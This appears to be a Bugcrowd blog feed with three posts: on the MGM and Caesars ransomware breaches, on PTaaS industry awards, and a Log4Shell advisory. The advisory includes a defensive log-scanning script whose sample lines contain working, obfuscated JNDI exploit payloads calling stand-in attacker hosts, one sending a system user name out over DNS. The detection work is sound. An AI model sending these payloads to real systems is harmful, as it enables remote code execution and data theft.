Security Flash Archives | Bugcrowd
https://www.bugcrowd.com/blog/category/security-flash/
Feed last updated: Tue, 28 Nov 2023 22:04:55 +0000

Security Flash – Cyberattacks on MGM and Caesars
https://www.bugcrowd.com/blog/security-flash-cyberattacks-on-mgm-and-caesars/
Thu, 12 Oct 2023 15:07:19 +0000

When it comes to your odds in Vegas, they say the house always wins. But if you’ve been following cybersecurity news over the past month, you probably know that lately, casino giants MGM Resorts International and Caesars Entertainment haven’t been dealt a winning hand. 

I sat down with Bugcrowd CTO and Founder, Casey Ellis, to understand what exactly is happening with these recent casino breaches.

What happened

In September, MGM, which owns more than 20 hotels and casinos, reported a cybersecurity issue that impacted digital systems ranging from hotel room keys to slot machines. Caesars Entertainment also experienced a breach, in which many Maine residents had their information stolen by a ransomware group. It is easy to point fingers when a breach happens, but in reality a breach can happen to anyone. What organizations can control is how prepared they are when one does. 

Based on current information, the breaches can be traced to a Russia-based ransomware group called ALPHV, which is known for using social engineering as its initial access technique. Social engineering preys on human instincts to find an easier way into an organization than a technical exploit. In the interview, Casey explained how common it is for humans to want to be helpful, especially at work. This is normally a great aspect of society, but it can also lead to costly mistakes when an organization is targeted by a social engineering campaign. “There are all sorts of techniques, but there is no technical control for humans wanting to be helpful. The bad guys know that and that’s part of what they exploit to do stuff like this,” Casey said. 

The impact

When the business operations of a casino and hotel come to a screeching halt, it is safe to say that breaches like these cost organizations millions of dollars, on top of untold reputational damage. 

Planned, orchestrated ransomware attacks like these often get announced in several places; for example, the ransomware group posts its note or claim on the internet, so the public can track what is going on. Even so, the MGM breach got more news coverage than the Caesars breach, for several reasons. The MGM breach had a more visible impact on daily operations and customers, so the story was picked up by more news outlets: the drama of people waiting in line for hours and flashing lights on slot machines makes a better news story. Another reason the Caesars attack seemingly went under the radar is that many believe Caesars paid the ransom, which allowed it to restore operations quickly. 

Casey predicted that gaming companies and casino giants will continue to be heavily targeted. Logically, this makes sense, given the massive amounts of money that threat actors are making from these sorts of attacks. 

Preventing cyberattacks 

For organizations watching these breaches and wondering what they should do to protect themselves from similar attacks, Casey recommends a tabletop exercise. In a tabletop exercise, the team sits around a table and walks through, step by step, what it would actually do in a hypothetical breach scenario. For example: your production systems are encrypted and inaccessible, your backup systems are gone too, and you have no skeleton infrastructure left to run operations from. What would you do? Work through the response, how long recovery would take, and how much it would cost.

This lets organizations test their response plans before they actually need them, instead of improvising in the chaos of a real event. “You want to freak out about this just enough to start asking new questions that are going to make you more resilient as an organization. I don’t believe in freaking out so much that you get paralyzed and just give up,” Casey said. 

As another step, organizations should examine their business operations and make it harder for attackers to get in in the first place. This is where security testing and organizations like Bugcrowd come in: the security researcher and hacker community can look at your systems and say, “if I were a bad guy trying to get into your stuff, here is how I would do it and here is how difficult or easy it would be.” That sort of knowledge is incredibly important from a preventative standpoint, because it lets organizations close those paths before threat actors even start looking at their systems. 

I hope you enjoy the interview just as much as I did! By the way, if you’re interested in stories of cybersecurity attacks, check out our new video series, Unsolved Cyber Mysteries.

The post Security Flash – Cyberattacks on MGM and Caesars appeared first on Bugcrowd.

Bugcrowd PTaaS Takes Home Five Awards for Cybersecurity Excellence
https://www.bugcrowd.com/blog/ptaas-takes-home-five-awards/
Thu, 11 May 2023 17:15:02 +0000

Since launching new self-service capabilities within our Penetration Testing as a Service (PTaaS) offering last month, we have already seen wide recognition of the technology’s ability to let buyers purchase, set up, and manage pen tests directly online, without the need for lengthy sales calls and scoping sessions. 

In 2023 alone, Bugcrowd, and in particular these new PTaaS capabilities, has won five distinct industry awards. This recent string of wins reflects Bugcrowd’s persistence in delivering industry-leading solutions to the market and validates its standing as an accomplished organization across cybersecurity.

Most recently, our team was recognized by Cyber Defense Magazine’s Global InfoSec Awards as a Hot Company in the Penetration Testing Category for our PTaaS capabilities, along with being recognized as a Gold Winner in the 19th Annual Globee® Cyber Security Awards for the technology. Additionally, Bugcrowd PTaaS was recognized as the Gold Winner in the Pentest-as-a-Service category in the 2023 Cybersecurity Excellence Awards among North American companies between 1,000 and 5,000 employees.

As an organization, we took home two more wins in the Cybersecurity Excellence Award program with recognition as Gold Winner for Cybersecurity Provider of the Year and Silver Winner for Best Cybersecurity Company.

Personally, I am so proud to see all of these incredible wins. It’s a huge testament to our stellar team and technology! At Bugcrowd, we are committed to delivering the very best crowdsourced solutions to our customers and ultimately fulfilling our mission to democratize security testing for all.

Our team has taken major strides over the past year to carry out this mission, including a major upgrade to our PTaaS offering, all aimed at staying at the forefront of innovation and leadership within a very saturated cybersecurity market. With a surge of vendors offering security testing solutions, a common concern we hear is that the vulnerability assessments on the market today are often shallow and low impact. 

Our goal was to provide a human-driven, high-impact pen test, with a team matched to the customer’s precise needs in just a few clicks, cutting configuration time from days to hours. These recent award wins validate our work and the direction we have been laser-focused on. By keeping our priorities on our employees, the hacker community, partners, and vendors, we are excited to build on this momentum throughout 2023!

To learn more about our award-winning PTaaS offering, which is now available globally, visit https://www.bugcrowd.com/products/pen-test-as-a-service/.

The post Bugcrowd PTaaS Takes Home Five Awards for Cybersecurity Excellence appeared first on Bugcrowd.

Log4Shell, The Worst Java Vulnerability in Years
https://www.bugcrowd.com/blog/log4shell-the-worst-java-vulnerability-in-years/
Mon, 13 Dec 2021 00:00:00 +0000

Key Facts

Affected: Systems and services using Apache Log4j versions 2.0-beta9 to 2.14.1
Severity: CVSS 10.0 (Critical)
CVE Entry: CVE-2021-44228
NIST NVD Publish Date: 12/10/2021
Source: Apache Software Foundation

On Dec. 9, 2021, a zero-day exploit (since dubbed “Log4Shell”) was observed in the wild targeting a critical RCE vulnerability in Log4j, the ubiquitous open source Java logging library. Per NIST, in affected versions the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. In practice, that means any attacker-controlled string that reaches a log statement (a User-Agent header, a username, a chat message) can carry a lookup of the form ${jndi:ldap://<attacker host>/x}; Log4j resolves the lookup, connects to the attacker’s server, and can end up loading and executing a Java class the server returns. Numerous platforms appear to have been affected, including Apple, Cloudflare, and Twitter, in addition to the raft of popular Java ecosystem products with Log4j embedded in their software supply chains, such as Logstash, Apache Kafka, Elasticsearch, and even Minecraft. 
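Because the exploit string has to pass through a log statement, access logs are the first place to hunt for it. The scanner below is an added example for this post, not code from Bugcrowd or from the original article; it shows why simply grepping for the literal “${jndi:” was not enough in the first days, when attackers wrapped the payload in nested Log4j lookups (${${lower:j}ndi:…}, ${${::-j}ndi:…}) that Log4j itself resolves back to the same string. The normalizer emulates the few lookup forms commonly used for that evasion (the :-default, lower: and upper: forms) before matching; the sample log lines and the addresses in them are constructed, not real traffic.

```python
"""
Added example (not code from the original post): spot Log4Shell
(CVE-2021-44228) exploitation attempts in web server access logs, including
the nested-lookup obfuscations used to evade naive "${jndi:" filters.
"""
import re
from typing import List, NamedTuple

# Innermost ${...} lookup (no nested lookup inside), except the jndi: lookup
# itself, which must stay intact for the final match.
_INNER = re.compile(r"\$\{(?!jndi:)([^${}]*)\}", re.IGNORECASE)

# Final check once nesting has been collapsed: scheme and host of the callback.
_JNDI = re.compile(r"\$\{jndi:\s*([a-z]+):/*([^/}\s:]+)", re.IGNORECASE)


def _resolve(content: str) -> str:
    """Emulate the subset of Log4j 2 lookup semantics abused for obfuscation."""
    # ${key:-default} -> default, which also covers ${::-j} and ${env:NOPE:-j}
    if ":-" in content:
        return content.split(":-", 1)[1]
    head = content.lower()
    if head.startswith("lower:"):
        return content[len("lower:"):].lower()
    if head.startswith("upper:"):
        return content[len("upper:"):].upper()
    # Any other lookup (${sys:...}, ${date:...}, ${env:...}): keep the text but
    # drop the braces, so an enclosing lookup becomes visible and the loop ends.
    return content


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until only ${jndi:...} is left."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


class Hit(NamedTuple):
    line_no: int
    scheme: str      # ldap, ldaps, rmi, dns, ...
    host: str        # attacker callback host, useful for blocking and hunting
    normalized: str  # the de-obfuscated log line


def scan(lines: List[str]) -> List[Hit]:
    """Return one Hit per log line carrying a (possibly obfuscated) JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append(Hit(n, m.group(1).lower(), m.group(2), norm))
    return hits


# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOGS = [
    '198.51.100.7 - - [10/Dec/2021:13:22:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:13:22:04 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.10/x}"',
    '198.51.100.9 - - [10/Dec/2021:13:22:09 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.11:1099/y}"',
    '198.51.100.10 - - [10/Dec/2021:13:22:15 +0000] "POST /search HTTP/1.1" 200 88 "-" "${${env:NaN:-j}ndi:dns://203.0.113.12/${sys:user.name}}"',
    '198.51.100.11 - - [10/Dec/2021:13:22:20 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.12 - - [10/Dec/2021:13:22:25 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 12 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit.line_no}: {hit.scheme} callback to {hit.host}")
```

On the sample above the scanner flags the first four lines and extracts the callback host from each, including the dns:// variant that exfiltrates ${sys:user.name}; the benign ${date:yyyy} lookup on the last line is not flagged. Treat this as a hunting aid, not a control: Log4j supports many more lookups than the three emulated here, payloads can arrive in headers you do not log, and the only real fix is removing the vulnerable Log4j from every artifact.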

Observers consider the Log4j vulnerability the worst one in years, perhaps even more critical than the Apache Struts RCE vulnerability (CVE-2017-5638) of 2017 that contributed to the massive breach at Equifax. Per Bugcrowd Founder and CTO Casey Ellis, this new vuln is a toxic cocktail combining immense attack surface, easy exploitation, hard-to-avoid dependencies, and extreme virality. Among other things, it is a reminder that software supply chains have become deeply complex, with layered transitive dependencies that are often beyond the reach of automated tools like network scanners: a vulnerable copy of Log4j may be bundled inside another vendor’s jar or container image rather than installed as a named package, so inventory your artifacts, not just your hosts. The fix is to upgrade Log4j to a release in which message lookups are removed; the early formatMsgNoLookups workaround proved incomplete (CVE-2021-45046), so do not rely on it in place of patching.

When the dust inevitably settles, it will be a clarifying moment for organizations that have yet to take a continuous, platform-powered security testing approach that combines data, technology, and human intelligence, including the force multiplier of the Crowd, to find and remediate vulnerabilities before they cause damage. In a future blog post, we’ll describe how that approach helped Bugcrowd verify, validate, contextualize, and communicate Log4Shell exposures to customers within hours.

In the meantime, we’re eager to help by offering:

  1. A 30-day “Log4j On Fire” bug bounty solution for continuous, crowd-powered discovery of Log4Shell exposures on your perimeter. See details and get started here.
  2. Deeper insights about this vuln’s risk profile and future impact in this Security Flash video featuring Casey Ellis and Application Security Engineer Adam Foster.
  3. A live Q&A session with Casey next week (Monday Dec. 20 at 10am PST) to answer your questions about finding, safeguarding, and using best practices to address the Log4j vuln and Log4Shell exploit. Save your seat here.
  4. A single view into all our Log4j/Log4Shell resources here.

We are super proud of our customers, researchers, and team-members who are working together tirelessly to make our digitally connected world safer during this crisis. As always, we’ll get through it together!

The post Log4Shell, The Worst Java Vulnerability in Years appeared first on Bugcrowd.
